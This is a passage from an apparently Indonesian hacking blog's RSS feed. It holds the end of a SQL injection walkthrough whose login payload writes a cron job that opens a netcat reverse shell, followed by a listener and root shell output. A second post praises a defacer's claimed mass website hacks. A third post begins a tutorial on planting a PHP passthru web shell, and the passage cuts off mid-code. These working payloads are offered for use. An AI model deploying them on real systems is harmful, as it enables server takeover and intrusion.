monospace;"&gt;&lt;b&gt;myusername=admin&amp;amp;mypassword=%27 and 1=1 union select 0x20,0x20,0x20 into outfile '/etc/cron.d/backdoor' lines terminated by 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203137322e31362e3234332e312031323334202d65202f62696e2f626173680a -- &amp;amp;Submit=Login&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-S_1D-IkmeSo/T59zJnNMRYI/AAAAAAAABX0/1sAKZQSiA0w/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="163" src="http://3.bp.blogspot.com/-S_1D-IkmeSo/T59zJnNMRYI/AAAAAAAABX0/1sAKZQSiA0w/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Perintah di atas akan membuat file baru bernama backdoor pada directory /etc/cron.d/. Sebelum klik tombol GO pada burpsuite, masukan perintah berikut pada terminal, ini berfungsi agar anda dapat menerima koneksi netcat dari root komputer target.&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;netcat -l -v -p 1234&lt;br /&gt;listening on [any] 1234 ...&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;Kemudian klik tombol GO. Ok, kali ini saya akan membuat bukti bahwa file cron.d dieksekusi dalam 2 menit. Setelah mengklik tombol GO, saya melakukan cek tanggal dan waktu.&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;Tue May&amp;nbsp; 1 11:45:53 WIT 2012 &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-jaH2yPFVnPg/T59zTELWNgI/AAAAAAAABX8/ayFsX4IWbvg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="http://3.bp.blogspot.com/-jaH2yPFVnPg/T59zTELWNgI/AAAAAAAABX8/ayFsX4IWbvg/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size: large;"&gt;&lt;b&gt;3. Game Over&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Jika file /etc/cron.d/backdoor pada server target berhasil dieksekusi, maka pada konsol netcat akan muncul.&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;netcat -l -v -p 1234&lt;br /&gt;listening on [any] 1234 ...&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;172.16.243.128: inverse host lookup failed: Unknown host&lt;br /&gt;connect to [172.16.243.1] from (UNKNOWN) [172.16.243.128] 50648 &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;Kemudian saya cek kembali tanggal saya&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;Tue May&amp;nbsp; 1 11:45:53 WIT 2012&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;date&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;Tue May&amp;nbsp; 1 11:47:03 WIT 2012&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;File /etc/cron.d/backdoor dieksekusi dalam waktu kurang dari 2 menit. Sekarang kita cek ID pada netcat kita, apakah ini root?&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt; &lt;span style="color: cyan;"&gt;5&lt;/span&gt; &lt;span style="color: red;"&gt;R2&lt;/span&gt; &lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt; &lt;b&gt;netcat -l -v -p 1234&lt;br /&gt;listening on [any] 1234 ...&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;172.16.243.128: inverse host lookup failed: Unknown host&lt;br /&gt;connect to [172.16.243.1] from (UNKNOWN) [172.16.243.128] 50648 &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-color: black; display: block; height: auto; max-height: 200px; overflow: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;id&lt;br /&gt;uid=0(root) gid=0(root) groups=0(root) &lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-FpgzJFO8_0A/T590CJ6-yUI/AAAAAAAABYE/_KP4ii15gYE/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="145" src="http://1.bp.blogspot.com/-FpgzJFO8_0A/T590CJ6-yUI/AAAAAAAABYE/_KP4ii15gYE/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;There you go! You got root.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;You are so #pwned by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-6638825346867158294?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/sql-injection-level-4-final.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-ACOVaEmb01A/T59xTd_ZNYI/AAAAAAAABXk/4swtQDE9zpg/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-4860823277123356011</guid><pubDate>Sat, 21 Apr 2012 03:33:00 +0000</pubDate><atom:updated>2012-04-21T10:33:00.441+07:00</atom:updated><title>About The Greatest Hacker</title><description>&lt;span style="font-family: monospace;"&gt;Sebelum saya menjelaskan siapa Hacker Terhebat di dunia versi saya, saya akan menyebutkan kriteria hacker yang berkualitas.&lt;/span&gt;&lt;br /&gt;&lt;div style="font-family: monospace;"&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;ol&gt;&lt;li&gt;Hacker bukan seseorang yang hebat menggunakan perangkatnya saja, melainkan hebat menggunakan akalnya.&lt;/li&gt;&lt;li&gt;Hacker yang melakukan defacing web site dengan tujuan mencari popularitas, tidak lebih dari seorang n00b.&lt;/li&gt;&lt;li&gt;Hacker yang menyukai satu metode dalam kondisi yang sama, tidak lebih dari seorang fanatik.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Andakah hacker berkualitas tersebut? Jika anda ingin nama anda dimasukan di dalam daftar tunggal ini, maka anda harus melakukan komparasi terhadap hacker yang saya agungkan ini.&lt;/div&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Perkenalkan....&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;span style="color: red; font-size: large;"&gt;TiGER-M@TE&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Apa yang membuat hacker ini hebat? OK, saya akan menjelaskan sepak terjang hacker yang satu ini.&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Meretas 700.000 situs&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Hacker ini berkewargenagaraan Bangadesh, memulai dunia peretasannya dari tahun 2007 hingga saat ini. Hacker ini bergerak secara diam-diam dan tertutup dengan baik (underground hacker). Hingga namanya mencuat pada pertangahan september 2011, karena melakukan defacing 700.000 (Tujuh Ratus Ribu) website dalam satu kali aksi!&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;TiGER-M@TE&lt;/b&gt;:&amp;nbsp;&lt;i&gt;&lt;span style="color: lime;"&gt;"Secara teknis, saya meretas 700.000 situs. Itu mungkin menjadi rekor dunia baru. Setelah mengajukan 200.000 website yang saya retas ke&amp;nbsp;&lt;a href="http://zone-h.com/" target="_blank"&gt;Zone-H&lt;/a&gt;, situs Zone-H menjadi down berulang kali, dan hampir tidak responsif pada akhirnya. Sehingga saya tidak bisa mengajukan semua daftar situs yang saya retas ke Zone-H. Sehingga saya mencatat 700.000 situs yang saya retas di&amp;nbsp;&lt;a href="http://www.multiupload.com/UZLP578J50" target="_blank"&gt;multiupload&lt;/a&gt;. Itu bukan sekedar peretasan server, sebenarnya semua data center telah diretas."&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Beberapa daftar situs yang berhasil di-submit ke zone-h dapat dilihat di&amp;nbsp;&lt;a href="http://www.zone-h.org/archive/notifier=TiGER-M@TE" target="_blank"&gt;sini&lt;/a&gt;.&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Meretas situs Google&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Pada 8 January 2011. Negara Bangladesh dikejutkan dengan situs Google yang berubah tampilan menjadi seperti ini.&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: monospace; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_bCYQxIvMQ2U/TS0QAKqARXI/AAAAAAAAAqw/R7SPaQCjTKA/s1600/google-bangladesh-hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://2.bp.blogspot.com/_bCYQxIvMQ2U/TS0QAKqARXI/AAAAAAAAAqw/R7SPaQCjTKA/s320/google-bangladesh-hacked.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Cache masih tersimpan di&amp;nbsp;&lt;a href="http://www.zone-h.org/mirror/id/12874645" target="_blank"&gt;sini&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Bagaimana mungkin?!&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;Unix Root : "Ceritakan pada kami mengenai identitas anda"&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;TiGER-M@TE:&amp;nbsp;&lt;span style="color: lime;"&gt;"Saya berkewarganegaraan bangladesh, memulai dunia peretasan pada tahun 2007 dan saya bekerja sendiri. Saya lebih suka meretas server daripada meretas aplikasi web"&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;Unix Root : "Apa benar anda yang meretas Google pada 8 Januari 2011?&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;TiGER-M@TE :&amp;nbsp;&lt;span style="color: lime;"&gt;"Sebenarnya bukan hanya google, saya juga meretas Yahoo, Avast, Microsoft, Bing, Nokia, dan Kaspersky"&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;Unix Root : "Bagaimana anda bisa meretas Google, banyak hacker yang ingin tau cara ini"&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;TiGER-M@TE :&amp;nbsp;&lt;span style="color: lime;"&gt;"Sebenarnya itu adalah DNS HiJack, bukan DNS Poison"&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div&gt;&lt;b&gt;Unix Root : "Apakah ada kerusakan yang anda buat, atau apakah anda mengambil backup data milik google?"&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;TiGER-M@TE :&amp;nbsp;&lt;span style="color: lime;"&gt;"Karena metode yang saya gunakan adalah DNS HiJack, jadi tidak ada kerusakan data pada domain tersebut."&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div&gt;&lt;b&gt;Unix Root : "Apa ada peretasan besar lainnya yang pernah anda lakukan?"&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;TiGER-M@TE :&amp;nbsp;&lt;span style="color: lime;"&gt;"Peretasan besar... Saya adalah pria yang meretas Airtel, Warid, dan American Express."&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div&gt;&lt;b&gt;Unix Root : "Ada pesan untuk hacker-hacker di luar sana?"&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;TiGER-M@TE :&amp;nbsp;&lt;span style="color: lime;"&gt;"Coba tulis kode exploit milik anda sendiri, Gunakan kode exploit anda sendiri, jangan gunakan kode exploit milik orang lain. Ini akan membantumu untuk mendapatkan apapun yang kau butuhkan sebelum proses peretasan, ketahui setiap hal dan ketahui bagaimana sebuah proses bekerja. Meretas adalah semua tentang pengetahuan dan skill"&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;&lt;span style="color: lime;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;Saya rasa ini adalah jalan hacker yang sesungguhnya. Bukan hacker yang hanya mengandalkan SQLinjection, LFI, RFI, DNS Poisoning, BOT, dan Jumping Server. Jika anda memiliki versi lain dari hacker terhebat di dunia, berikan pendapat anda ke doubledragon666@gmail.com&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font-family: monospace;"&gt;&lt;b&gt;writen by :&amp;nbsp;&lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-4860823277123356011?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/04/about-greatest-hacker.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_bCYQxIvMQ2U/TS0QAKqARXI/AAAAAAAAAqw/R7SPaQCjTKA/s72-c/google-bangladesh-hacked.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-8977134999383392434</guid><pubDate>Thu, 12 Apr 2012 05:32:00 +0000</pubDate><atom:updated>2012-04-30T12:35:36.523+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SQL Injection</category><category domain='http://www.blogger.com/atom/ns#'>backdoor</category><category domain='http://www.blogger.com/atom/ns#'>burpsuite</category><title>SQL Injection Level 4 [Part 3]</title><description>Ini adalah kelanjutan dari&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/04/sql-injection-level-4-part-1.html" target="_blank"&gt;SQL Injection Level 4 [Part 2]&lt;/a&gt;. Sebelum masuk ke tahap ini, saya sarankan pembaca memahami konsep dari Part 1, dan Part 2 terlebih dahulu. &lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya masih menggunakan tools burpsuite.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation :&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Burpsuite&lt;/li&gt;&lt;li&gt;Browser&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Legal&amp;nbsp;Disclaimer:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Tutorial ini bertujuan sebagai pembelajaran dan edukasi, penyalah gunaan ilmu ini di luar tanggung jawab penulis.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Walkthrough&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Mengenal konsep backdoor php&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;Pada tutorial sebelumnya, saya sudah menjelaskan mengenai dumping username dan password menggunakan perintah sederhana yang dilakukan oleh repeater pada tool burpsuite. Kali ini saya akan memasang backdoor sederhana, hanya dengan menggunakan burpsuite.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Contoh sederhana dari backdoor php dengan menggunakan perintah passthru.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; line-height: 18px; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&amp;lt;?php&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;passthru($_GET['cmd']);&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco,Consolas,Courier,monospace;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: 